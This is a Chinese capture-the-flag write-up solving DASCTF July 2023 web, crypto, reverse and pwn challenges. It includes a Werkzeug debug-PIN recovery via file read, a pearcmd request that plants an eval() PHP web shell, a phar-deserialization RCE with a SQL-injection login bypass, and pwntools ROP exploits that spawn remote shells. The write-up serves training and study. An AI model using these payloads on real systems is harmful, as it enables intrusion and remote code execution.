DASCTF 2023七月赛-WriteUp By EDISEC



01

Web

1

ezflask

先读取网卡 MAC 地址(/sys/class/net/eth0/address),再把它转换成十进制数;这个值是后面计算 Werkzeug 调试 PIN 的输入之一。

POST /register HTTP/1.1Host: fb37c273-244d-43e4-8366-d915a7a5a84a.node4.buuoj.cn:81User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/jsonContent-Length: 145
{"username":"f","password":"f","u005fu005fu0069u006eu0069u0074u005fu005f":{"__globals__":{"__file__":"/sys/class/net/eth0/address"}}}


读取 /etc/machine-id

96cec10d3d9307792745ec3b85c89620

读取cgroup 这里有点坑

{"username":"su","password":"su","u005fu005fu0069u006eu0069u0074u005fu005f":{"__globals__":{"__file__":"/proc/self/cgroup"}}}
cgroup 的值要取完整的最后一段(包含 docker- 前缀和 .scope 后缀),而不是只取中间的容器 ID:
docker-dd0b25f3d46cf1a527e51b81aa90d16a01e0f2032fd1212688e6a5573a841b82.scope


最后脚本
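import hashlib
from itertools import chain

# Re-computes the Werkzeug debugger PIN from the same inputs the server hashes.
# Every input below is a value that can be obtained through a file-read
# primitive, so the PIN is not a secret once such a primitive exists; the
# interactive debugger should never be enabled on a reachable deployment.
probably_public_bits = [
    'root',  # username the application process runs as
    'flask.app',  # modname
    'Flask',  # getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.10/site-packages/flask/app.py',  # getattr(mod, '__file__', None)
]

# This information is here to make it harder for an attacker to
# guess the cookie name.  They are unlikely to be contained anywhere
# within the unauthenticated debug page.
private_bits = [
    # str(uuid.getnode()): the MAC address from /sys/class/net/eth0/address
    # (the path requested in this write-up), converted to decimal.
    '112772796131818',
    # Machine id: /etc/machine-id + /proc/sys/kernel/random/boot_id + /proc/self/cgroup
    # Earlier attempt kept from the original write-up (bare container id):
    # '96cec10d3d9307792745ec3b85c89620 867ab5d2-4e57-4335-811b-2943c662e936 dd0b25f3d46cf1a527e51b81aa90d16a01e0f2032fd1212688e6a5573a841b82'
    # Value actually used: machine-id immediately followed by the full last
    # path component of the cgroup line ("docker-<id>.scope").
    '96cec10d3d9307792745ec3b85c89620docker-dd0b25f3d46cf1a527e51b81aa90d16a01e0f2032fd1212688e6a5573a841b82.scope',
]

# Feed every non-empty bit into one SHA-1 state, then the cookie salt.
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode("utf-8")
    h.update(bit)
h.update(b"cookiesalt")

cookie_name = f"__wzd{h.hexdigest()[:20]}"

# The PIN reuses the same hash state with one more salt, so it never equals
# the cookie name; keep the first nine decimal digits.
h.update(b"pinsalt")
num = f"{int(h.hexdigest(), 16):09d}"[:9]

# Group the digits (5, 4 or 3 per group, first size that divides evenly) for
# readability; fall back to the ungrouped number if none divides the length.
for group_size in 5, 4, 3:
    if len(num) % group_size == 0:
        rv = "-".join(
            num[x: x + group_size].rjust(group_size, "0")
            for x in range(0, len(num), group_size)
        )
        break
else:
    rv = num

print(rv)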


2

ezcms

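利用文件包含漏洞包含 pearcmd.php,借助其 config-create 命令把一句话木马写入 /tmp/hello.php。该手法依赖包含路径可控且 PHP 开启了 register_argc_argv,因此防御上应对包含参数做白名单限制,并关闭 register_argc_argv 或从镜像中移除 pear。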

GET /admin/?+config-create+/&r=../../../../../../../../usr/share/php/pearcmd&/<?=@eval($_POST['1']);?>+../../../../../../../../../../tmp/hello.php HTTP/1.1Host: 1f0a6411-b816-458b-8117-9a64526a4a52.node4.buuoj.cnCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: user=adminConnection: closeContent-Length: 2
然后蚁剑连一下


3

MyPicDisk

构造 phar 文件:把 FILE 对象写入元数据,服务端以 phar:// 访问该文件时会反序列化它,从而执行对象中携带的命令(RCE):

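// Builds a phar archive whose metadata is a serialized FILE object, then
// copies it to a .jpg name. FILE is the challenge application's own class and
// is not defined in this snippet.
// Review notes: the "GIF89a" stub prefix means an upload check that looks only
// at the extension or the leading magic bytes accepts this file as an image.
// Up to PHP 7.x, opening a path through the phar:// wrapper unserializes the
// metadata; PHP 8.0 stopped doing that automatically. Filesystem functions
// should not receive user-controlled paths that may carry a stream wrapper.
@unlink("phar.phar");
$phar = new Phar("phar.phar"); // the file extension must be .phar
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); // set the stub
$o = new FILE(";cat /adjaskdhnask_flag_is_here_dakjdnmsakjnfksd");
// $o->data='hello L1n!';
$phar->setMetadata($o); // store the custom metadata object in the manifest
$phar->addFromString("test.txt", "test"); // add a file to the archive
// the signature is computed automatically
$phar->stopBuffering();
copy("phar.phar","1.jpg");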

phar

import requests
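# Two-step request script from the write-up: (1) upload the crafted 1.jpg,
# (2) ask the application to process it through the phar:// wrapper.
# Review notes: the login is bypassed by an always-true injection string in
# `username`, which suggests the server builds its authentication query by
# string concatenation (parameterise or escape it). The `file` parameter also
# accepts a stream-wrapper URL, so the server should reject scheme prefixes
# and resolve paths against an allow-listed directory.

# Traffic is routed through a local intercepting proxy.
proxy = {"http": "http://127.0.0.1:8080"}
burp0_url = "http://8ea14a59-3600-4799-a424-95e815a3d71f.node4.buuoj.cn:81/?"
burp0_cookies = {"PHPSESSID": "su"}

data = {
    'username': "x' or 1=1 or '='",
    'password': '1',
    'submit': '登录',
}

# Step 1 (left disabled, as in the original): upload the file. The handle is
# opened in a `with` block so it is closed once the request has been sent.
# with open('1.jpg', 'rb') as fh:
#     files = {'file': ('1.jpg', fh, 'image/jpeg')}
#     res = requests.post(burp0_url, cookies=burp0_cookies, files=files, data=data, proxies=proxy)
#     print(res.text)

# Step 2: reference the uploaded file through phar:// and print the response.
burp0_url = "http://8ea14a59-3600-4799-a424-95e815a3d71f.node4.buuoj.cn:81/?file=phar:///var/www/html/1.jpg&todo=md5"
res = requests.post(burp0_url, cookies=burp0_cookies, data=data, proxies=proxy)
print(res.text)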

02

Crypto

1

ezDHKE

from Crypto.Util.number import *from Crypto.Cipher import AESfrom hashlib import sha256
# while True:# t=1# l=[]# while t.nbits()<2048:# a=random_prime(100000)# t*=a# l.append(a)# if t.nbits()>1024 and isPrime(t+1) and len(l)==len(set(l)):# print(t+1)# print(l)# exit()
p=1646039467760809921384417881318197632339729798701743316871779850730124088235436739037968289129536052168492084895137755114367779627845101342493451953829768631969601283780866295185242377063883325908871505866245527390990448629751692756531170637001687312940503576522908824526727196004536948265796604296543889852653977581742290591503310677269244004712431403524841511882076378232121815100575905435360285461024033876106466429972220277383625270372343065189430613366863680114944949036697714384255267285185566915513090670999430637460297692866855976927251556192893170864723023555645173635269957891801939111l=[13649, 40093, 95083, 21871, 67157, 92177, 85447, 86753, 16831, 32783, 36559, 6857, 1993, 36947, 58937, 64123, 4547, 58913, 23117, 35081, 95561, 96643, 3041, 57859, 44417, 9601, 63397, 40387, 43969, 80777, 88919, 70207, 52631, 59393, 78193, 5507, 41381, 23971, 11093, 33809, 68891, 25343, 22343, 26713, 30269, 10301, 76649, 48449, 6277, 56843, 34313, 44917, 80273, 47189, 48281, 88853, 51907, 70951, 27427, 73607, 6949, 51581, 46747, 50111, 21751, 35509, 11689, 57943, 59077, 4729, 80191, 16729, 38923, 82471, 82241, 95261, 9833, 15907, 3203, 64237, 36901, 45131, 17599, 60649, 68141, 85297, 77471, 56237, 99277, 53633, 64439, 5, 13757, 34913, 86531, 21433, 31337, 48883, 36791, 45659, 87701, 4721, 73127, 51047, 17021, 61357, 80629, 19793, 23957, 28813, 12659, 98947, 49279, 14843, 13567, 26497, 69767, 56929, 73681, 19087, 31477, 2, 9623, 28949, 15107, 8171, 61879, 3137, 3373, 78787, 48527, 81013, 
70481]ac=447927943942152454373915579633463093296672216442472107978411572732990249215109985995113994575122785857839865905380229440505412692175644056707487916149314099842537281325961844427878624082469925688698136348085846648819514068506888458337222398821510017492830740239598664872954200404967440361730590362895433016481048430556627764219294182844797733360938122131955776020485985511681423911906788781129508019991619460137558083441524973560987014362069247739505273471535172287834587124251838304726354056688492724602512939362242822011341577190328891585810979110884044413058535867407607042061558588577607813bc=1215701116638513048956192334013574363292697982329500270672223365449322285343258357856140021209541841105536023240347182450820348160903285459249603862534732957814200870654727545068158938148096897066999286101391138578843914723741106474935318173212665797672002768593273126060886749681910158923569198408587556456244201184768549856251812639668308787670614535869058553159333984053247475656175245944990166412146860426158176905181769939395344930496657103472683690245076083140489841761198977242719988769394183942705563073031538387891598159832495761710192522129290024704367592318316401954732048127878097176enc=b'xed)Xx99xb4Px00x8cjx06Uxe1xe6Ixb3Wx94xb0xb7jxe5x1axcd0x93x84x12xd7Dx0cxf9x05x8a^x89Exb1xe43dYx9exe6xd7cWx9cx89'n=p-1t=[]F=GF(p)
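from sage.groups.generic import bsgs

# Pohlig-Hellman recovery of the private exponent behind `ac`.
# `l` is the list of small primes given with the challenge and n = p - 1; the
# commented-out generator above builds p as (product of primes < 100000) + 1,
# so p - 1 is smooth. For each prime i the problem is projected into the
# subgroup of order i, where baby-step/giant-step over the range (0, i) is
# cheap. Base 2 is taken from the pow(2, ...) call.
# Review note: a Diffie-Hellman modulus with smooth p - 1 offers no protection
# for the exponent; use a safe prime or a standardised group.
for i in l:
    a = pow(ac, n // i, p)
    r = bsgs(F(pow(2, n // i, p)), F(a), (0, i))
    t.append(ZZ(r))

# Combine the per-prime residues into the exponent modulo prod(l).
alice = CRT(t, l)

# Shared secret = bc ** alice mod p; its SHA-256 digest is the AES-CBC key,
# used with the fixed IV below.
key = sha256(long_to_bytes(ZZ(pow(bc, alice, p)))).digest()
iv = b"dasctfdasctfdasc"
aes = AES.new(key, AES.MODE_CBC, iv)
m = aes.decrypt(enc)
print(m)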

2

ezRSA

from Crypto.Util.number import *
N,gift,nN=75000029602085996700582008490482326525611947919932949726582734167668021800854674616074297109962078048435714672088452939300776268788888016125632084529419230038436738761550906906671010312930801751000022200360857089338231002088730471277277319253053479367509575754258003761447489654232217266317081318035524086377, 8006730615575401350470175601463518481685396114003290299131469001242636369747855817476589805833427855228149768949773065563676033514362512835553274555294034, 14183763184495367653522884147951054630177015952745593358354098952173965560488104213517563098676028516541915855754066719475487503348914181674929072472238449853082118064823835322313680705889432313419976738694317594843046001448855575986413338142129464525633835911168202553914150009081557835620953018542067857943s,f=69307306970629523181683439240748426263979206546157895088924929426911355406769672385984829784804673821643976780928024209092360092670457978154309402591145689825571209515868435608753923870043647892816574684663993415796465074027369407799009929334083395577490711236614662941070610575313972839165233651342137645009, 46997465834324781573963709865566777091686340553483507705539161842460528999282057880362259416654012854237739527277448599755805614622531827257136959664035098209206110290879482726083191005164961200125296999449598766201435057091624225218351537278712880859703730566080874333989361396420522357001928540408351500991e = 11
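def gcd(g1, g2):
    """Return the monic greatest common divisor of two polynomials.

    Runs the Euclidean algorithm with ``%`` as polynomial remainder and
    normalises the result with ``.monic()``. Both arguments are expected to be
    polynomials over the same ring (they are built from ``PolynomialRing``
    further down in this script).
    """
    while g2:
        g1, g2 = g2, g1 % g2
    return g1.monic()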
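# Factor N from `gift`. The update rule below treats gift as P xor (Q >> 16)
# (presumably how the challenge produced it -- confirm against the task
# source). The top 16 bits of gift are then the top 16 bits of P, which gives
# a first approximation of P and hence of Q = N // P; each round refines both.
P = (gift >> (512 - 16)) << (512 - 16)
Q = N // P
for i in range(33):
    P = gift ^^ (Q >> 16)
    Q = N // P
assert isPrime(P) and isPrime(Q)

# Decrypt nN under (N, e) to get the second modulus. N is added back because
# the decryption only yields the value modulo N.
d = inverse(e, (P - 1) * (Q - 1))
n = pow(nN, d, N)
n = ZZ(n)
n += N

# Related-message step: g1 and g2 are built so that they share the unknown x
# as a root modulo n, so their GCD is the linear factor (x - root).
# NOTE(review): s and f look like the e-th powers of x and of the padded
# message respectively -- confirm against the task source.
PRx.<x> = PolynomialRing(Zmod(n))
g1 = x^e - s
# t is tried for every value in 11..127 because the shift applied to the
# b"dasctf{" prefix in the message template depends on it.
for t in range(11, 128):
    m = (bytes_to_long(b"dasctf{") << (t*8 + 8)) + x*2^8 + bytes_to_long(b"}")
    g2 = m^e - f
    common = gcd(g1, g2)
    # A constant term of 1 means the polynomials are coprime for this t.
    if common[0] == 1:
        continue
    # The monic factor is x - root, so the root is minus the constant term.
    rr = ZZ(-common[0])
    print(long_to_bytes(rr))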

03

Re

1

controflow

// xor 0x401// Add i*i// xor i * (i + 1)// minus + multiply// substitute
#include <stdio.h>
/*
 * Undoes the five stages listed in the comment above (xor 0x401, add i*i,
 * xor i*(i+1), subtract/multiply, substitute) in reverse order, starting
 * from the 40 target values, and prints each recovered value in hex.
 */
int main()
{
    int v3[40] = {
        3279, 3264, 3324, 3288, 3363, 3345, 3528, 3453, 3498, 3627,
        3708, 3675, 3753, 3786, 3930, 3930, 4017, 4173, 4245, 4476,
        4989, 4851, 5166, 5148, 4659, 4743, 4596, 5976, 5217, 4650,
        6018, 6135, 6417, 6477, 6672, 6891, 7056, 7398, 7650, 7890
    };

    /* Undo the substitution: swap each adjacent pair in v3[10..29]. */
    for (int k = 10; k < 30; k += 2) {
        int tmp = v3[k];
        v3[k] = v3[k + 1];
        v3[k + 1] = tmp;
    }

    /* Undo the multiply/subtract stage: divide by 3, then add the index. */
    for (int k = 0; k < 40; ++k) {
        v3[k] = v3[k] / 3 + k;
    }

    /* Undo the xor with i*(i+1), which only touched v3[10..29]. */
    for (int k = 10; k < 30; ++k) {
        int i = k - 10;
        v3[k] ^= i * (i + 1);
    }

    /* Undo "add i*i", then the xor with 0x401, and print the result. */
    for (int k = 0; k < 40; ++k) {
        v3[k] -= k * k;
        v3[k] ^= 0x401;
        printf("%x", v3[k]);
    }

    return 0;
}

2

webserver

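from z3 import *

# 100 coefficients recovered from the binary. The equations below read them
# as key[10 * k + m], i.e. a 10x10 table indexed by unknown k and equation m.
key = [
    0x17, 0x0D, 0x04, 0x30, 0x29, 0x29, 0x2A, 0x21, 0x1E, 0x03,
    0x45, 0x01, 0x0D, 0x2D, 0x29, 0x40, 0x08, 0x50, 0x0F, 0x2A,
    0x38, 0x13, 0x3E, 0x46, 0x17, 0x3F, 0x1E, 0x44, 0x11, 0x38,
    0x5C, 0x0C, 0x10, 0x40, 0x1F, 0x03, 0x11, 0x47, 0x3A, 0x09,
    0x40, 0x53, 0x47, 0x34, 0x63, 0x59, 0x4C, 0x44, 0x01, 0x63,
    0x10, 0x10, 0x34, 0x2B, 0x00, 0x2C, 0x32, 0x20, 0x32, 0x1F,
    0x14, 0x3F, 0x02, 0x63, 0x00, 0x39, 0x4F, 0x2B, 0x47, 0x13,
    0x50, 0x5C, 0x5D, 0x3A, 0x54, 0x4A, 0x51, 0x2D, 0x37, 0x15,
    0x01, 0x63, 0x1E, 0x1C, 0x38, 0x01, 0x0C, 0x4D, 0x5C, 0x04,
    0x25, 0x43, 0x3C, 0x36, 0x33, 0x4F, 0x26, 0x57, 0x30, 0x10,
]

# 40 expected results, consumed in groups of ten (one group per solve).
v16 = [
    33211, 36113, 28786, 44634, 30174, 39163, 34923, 44333, 33574, 23555,
    35015, 42724, 34160, 49166, 35770, 45984, 39754, 51672, 38323, 27511,
    31334, 34214, 28014, 41090, 29258, 37905, 33777, 39812, 29442, 22225,
    30853, 35330, 30393, 41247, 30439, 39434, 31587, 46815, 35205, 20689,
]

# The ten unknown integers of one group.
a, b, c, d, e, f, g, h, x, y = Ints('a b c d e f g h x y')

# Initialise the solver and add one linear equation per m in 0..9.
# This run uses group index 3, i.e. the targets v16[30..39].
s = Solver()
for m in range(10):
    s.add(
        v16[10 * 3 + m]
        - a * key[m]
        - b * key[10 + m]
        - c * key[20 + m]
        - d * key[30 + m]
        - e * key[m + 40]
        - f * key[m + 50]
        - g * key[m + 60]
        - h * key[m + 70]
        - x * key[m + 80]
        - y * key[m + 90]
        == 0
    )

# Solve and print the ten values on one line, separated by spaces.
if s.check() == sat:
    model = s.model()
    print(model[a], model[b], model[c], model[d], model[e],
          model[f], model[g], model[h], model[x], model[y], end=' ')
else:
    print("No solution found")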
每 10 个方程可以解出一组(10 个)未知数。上面的脚本只解了下标为 3 的那一组(对应 v16[30..39]),其余各组应可按同样的方法分别求解。

04

Pwn

1

FileEditor

先用 replace_string 函数泄露 canary 和 rbp,然后用 find_string 函数泄露 ASLR 偏移(即程序加载基址),接着通过栈溢出 ROP 泄露 libc 地址,确认远程 libc 版本为 2.31,并返回到 main 函数;最后再次栈溢出执行 system("/bin/sh")。
from pwn import *#from LibcSearcher import *context(os='linux', arch='amd64', log_level='debug')#context(os='linux', arch='amd64')#context.terminal = ['tmux','splitw','-h']filename = './pwn2'debug = 0ip = 'node4.buuoj.cn'port = 27432so = ELF('/home/roach/glibc-patcher/libs/amd64/2.31-0ubuntu9.9_amd64/libc.so.6')
if debug: p = process(filename)else: p = remote(ip,port)
ru = lambda a: p.recvuntil(a)r = lambda n: p.recv(n)sla = lambda a,b: p.sendlineafter(a,b)sa = lambda a,b: p.sendafter(a,b)sl = lambda a: p.sendline(a)s = lambda a: p.send(a)
def inter() : p.interactive()def debu(cmd=''): gdb.attach(p,cmd) pause()def get_addr(): return u64(p.recvuntil(b'x7f')[-6:].ljust(8, b'x00'))def get_sysbin(libc_base,libc): return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/shx00'))def csu(rdi, rsi, rdx, rip, gadget) : return p64(gadget) + p64(0) + p64(1) + p64(rip) + p64(rdi) + p64(rsi) + p64(rdx) + p64(gadget - 0x1a)

def open(): sla(b'> choose:',b'1')
def show(): sla(b'> choose:',b'2')
def insert(n,m,content,flag=1): sla(b'> choose:',b'3') sla(b'n m:',str(n).encode()) sl(str(m).encode()) ru(b'sequence:') for i in range(m): if flag: sl(content[i]) else: s(content[i])
def delete(n,m): sla(b'> choose:',b'4') sla(b'(n):',str(n).encode()) sl(str(m).encode())
def editor(n,content): sla(b'> choose:',b'6') sla(b'modified:',str(n).encode()) sla(b'content:',content)
def find_string(strings,num): sla(b'> choose:',b'7') sla(b'for:',strings) for i in range(num): sla(b'(y/n)',b'y')
def replace_strings(search,replace,num): sla(b'> choose:',b'8') sla(b'for:',search) sa(b'with:',replace[0]) for i in range(num): sla(b'(y/n)n',b'y') sla(b'(y/n)n',b'y') sla(b'with:',replace[i+1]) sla(b'(y/n)n',b'y')

open()content = [b'abcd']insert(1,1,content)rep_content = [b'efgh'*26+b'p',b'efgh'*26]replace_strings(b'abcd',rep_content,1)show()ru(b'p')canary = u64(b'x00'+r(7))rbp = u64(r(6).ljust(8, b'x00'))print("canary :",hex(canary))print("rbp :",hex(rbp))editor(1,b'efgh'+b'x00'*(180-4))
content2 = [b'abcd'*26+b'x00x01'+b'ab'*6+b'qp'+b'xff', b'abcd'*26+p64(canary)+p64(rbp)+b'xff']insert(1,2,content2)show()#debu('b *$rebase(0x2159)')find_string(b'abcd',2)editor(1,b'abcd'*26+b'ab')show()ru(b'qp')aslr = u64(r(6).ljust(8, b'x00'))-0x152Bprint("aslr :",hex(aslr))editor(1,b'efgh'+b'x00'*(180-4))editor(2,b'efgh'+b'x00'*(180-4))show()
pop_rdi = aslr+0x2ac3printf_got = aslr+0x4F70puts_plt = aslr+0x11C0content3 = [b'abcd'*26+p64(canary)+p64(rbp)+p64(pop_rdi)+p64(printf_got)+p64(puts_plt)+p64(aslr+0x13c9)+b'xff']insert(1,1,content3)find_string(b'abcd',1)ru(b'foundx0a')libc = u64(r(6).ljust(8, b'x00'))-so.sym['printf']print("libc :",hex(libc))editor(1,b'efgh'+b'x00'*(180-4))show()content4 = [b'mnwe'*26+p64(canary)+p64(rbp)+p64(pop_rdi)+p64(libc+0x1b45bd)+p64(aslr+0x101a)+p64(libc+0x052290)+b'xff']insert(1,1,content4)#debu('b *$rebase(0x2159)')find_string(b'mnwe',1)inter()

2

VIPhouse

#coding:utf-8import sysfrom pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='./viphouse'#context.arch='amd64'while True :  # try :    elf=ELF(elfelf)    context.arch=elf.arch
gdb_text=''' telescope $rebase(0x202040) 16 '''
if len(sys.argv)==1 : clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6') io=process(elfelf) gdb_open=1 # io=process(['./'],env={'LD_PRELOAD':'./'}) clibc.srand(clibc.time(0)) libc=ELF('/lib/x86_64-linux-gnu/libc.so.6') # ld = ELF('/lib/x86_64-linux-gnu/ld.so.6') one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
else : clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6') io=remote('124.223.159.125',9999) gdb_open=0 clibc.srand(clibc.time(0)) libc=ELF('/lib/x86_64-linux-gnu/libc.so.6') # ld = ELF('/lib/x86_64-linux-gnu/ld.so.6') one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
def gdb_attach(io,a): if gdb_open==1 : gdb.attach(io,a)
def choice(a): io.sendlineafter('Choose an option: ',str(a))
def login(a,b): choice(1) io.sendlineafter(': ',a) io.sendlineafter(': ',b) def edit(a,b): choice(2) io.sendlineafter('Index:',str(a)) io.sendafter('content:',b)
def show(a): choice(3) io.sendlineafter('Index:',str(a))
def chk(): choice(4) io.sendlineafter('guess: n','x00'*8)
def logout(): choice(5)
def add(a): io.sendlineafter('Choice: ','1') io.sendlineafter('note: ',a)

login('adminx00','rootx00') choice(3) add(p64(elf.got['read'])) io.sendlineafter('Choice: ','3')

chk() data=io.recv(10) if 'Wrong' in data: io.close() continue
io.recvuntil('gift!') canary=int(io.recvuntil('n',drop=True),16)
logout() pay='rootx00'.ljust(0x40,'x00')+p64(canary)+p64(0x404c00)+p64(0x401CB6)+p64(elf.plt['puts'])+p64(0x401B18) choice(1) io.sendlineafter(': ','a') io.sendafter(': ',pay)
libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['read'] libc.address=libc_base bin_sh_addr=libc.search('/bin/shx00').next() system_addr=libc.sym['system'] free_hook_addr=libc.sym['__free_hook'] pop_rax_ret=libc.search(asm('pop rax;ret')).next() pop_rdi_ret=libc.search(asm('pop rdi;ret')).next() pop_rsi_ret=libc.search(asm('pop rsi;ret')).next() pop_rdx_ret=libc.search(asm('pop rdx;ret')).next() syscall_ret=libc.search(asm('syscall;ret')).next()

choice(3) io.sendlineafter('Choice: ','2') add(p64(bin_sh_addr)) io.sendlineafter('Choice: ','3') logout() choice(1) pay='rootx00'.ljust(0x40,'x00')+p64(canary)+p64(0x404c00)+p64(0x401CB6)+p64(system_addr)+'n' io.sendlineafter(': ','a')
gdb_attach(io,gdb_text) sleep(0.2) io.sendafter(': ',pay) success('libc_base:'+hex(libc_base)) # success('heap_base:'+hex(heap_base))
io.interactive()
# except Exception as e: # io.close() # continue # else: # continue



原文始发于微信公众号(EDI安全):DASCTF 2023七月赛-WriteUp By EDISEC
